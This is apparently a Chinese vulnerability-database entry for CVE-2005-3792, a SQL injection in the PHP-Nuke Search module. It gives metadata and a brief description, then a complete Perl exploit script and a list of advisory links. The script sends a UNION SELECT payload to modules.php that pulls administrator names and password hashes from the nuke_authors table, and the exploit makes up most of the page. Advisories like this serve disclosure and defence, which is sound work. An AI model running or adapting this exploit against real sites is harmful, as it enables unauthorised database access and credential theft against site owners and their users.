PHPNuke Search模块SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109262 漏洞类型 SQL注入
发布时间 2005-11-16 更新时间 2005-11-28
CVE编号 CVE-2005-3792 CNNVD-ID CNNVD-200511-378
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/1326
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200511-378
|漏洞详情
phpnuke是一套开放源码建站程序。PHP-Nuke7.8以及patch3.1的7.9之前的其他版本中search模块内存在多个SQL注入漏洞,可让远程攻击者执行任意SQL命令.
|漏洞EXP
#!/usr/bin/perl -w
use IO::Socket;

if (@ARGV < 2)
{
print "*---------------------------------------*\n";
print "* EXPLOIT for PHPNuke <=7.8 *\n";
print "*---------------------------------------*\n\n";
print " Usage : \n";
print " PHPNuke[1] HOST /[path_phpnuke] \n\n";
print " HOST - Host where is phpnuke example: localhost \n\n";
print " Example :\n\n";
print " PHPNuke[1] www.victim.com /phpnuke/html/ \n\n";
exit();
}

$HOST = $ARGV[0];
$phpnuke_path = $ARGV[1];

print "\n";
print "Host : $HOST\n";
print "phpnuke_path : $phpnuke_path\n";
print "\n";
$OK = 0;
$modules = "modules.php";
$query = "name=Search&query=s%')/**/UNION/**/SELECT/**/0,pwd,0,aid,0,0,0,0,0,0/**/FROM/**/nuke_authors/*";
$length = length $query;
$GET = $phpnuke_path . $modules;
print "[*] Connecting at victim host [OK]\n";
$send = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80") || die "[*] Connect [FAILED]\n";
print "[*] Connected [OK]\n";
print "[*] Sending exploit [OK]\n\n";
print $send "POST ".$GET." HTTP/1.0\n";
print $send "Host: ".%HOST."\n";
print $send "Referer: http://".%HOST.$phpnuke_path."modules.php?name=Search \r\n";
print $send "User-Agent: Internet Explorer 6.0 [SR]\n";
print $send "Content-Type: application/x-www-form-urlencoded\n";
print $send "Content-Length: ".$length."\n\n";
print $send $query;
print $send "Cookie: lang=english\r\n\r\n";
print $send "Connection: close\n\n";

print "[*] Exploit send [OK]\n";
print "[*] Wait for reply...[OK]\n";
while ($answer = <$send>)
{
if ($answer =~ /=0"><b>([^:]*)<\/b>/ ) { 
$OK = 1;
print "[*] Success [OK]\n";
print "[*] USER: $1\n";
}
if ($answer =~ /=\"0">([^:]*)<\/a>/ ) { 
$OK = 1;
print "[*] PASSWORD: $1\n";
}
}
if ($OK == 0) { print "[*] Exploit [FAILED]\n"; }

# milw0rm.com [2005-11-16]
|参考资料

来源:XF
名称:phpnuke-query-sql-injection(23079)
链接:http://xforce.iss.net/xforce/xfdb/23079
来源:BID
名称:15421
链接:http://www.securityfocus.com/bid/15421
来源:MISC
链接:http://securityreason.com/achievement_exploitalert/5
来源:SECUNIA
名称:17543
链接:http://secunia.com/advisories/17543/
来源:BUGTRAQ
名称:20051115CriticalSQLInjectionPHPNuke<=7.8
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=113210758511323&w=2
来源:MISC
链接:http://www.waraxe.us/advisory-46.html
来源:BUGTRAQ
名称:20060219[waraxe-2006-SA#046]-CriticalsqlinjectioninphpNuke7.5-7.8
链接:http://www.securityfocus.com/archive/1/archive/1/425508/100/0/threaded
来源:BUGTRAQ
名称:20060221Re:[waraxe-2006-SA#046]-CriticalsqlinjectioninphpNuke7.5-7.8
链接:http://www.securityfocus.com/archive/1/425627/100/0/threaded
来源:OSVDB
名称:20866
链接:http://www.osvdb.org/20866
来源:VUPEN
名称:ADV-2005-2446
链接:http://www.frsirt.com/english/advisories/2005/2446
来源:SECTRACK
名称:1015651
链接:http://securitytracker.com/id?1015651
来源:SECTRACK
名称:1015215
链接:http://securitytracker.com/id?1015215
来源:F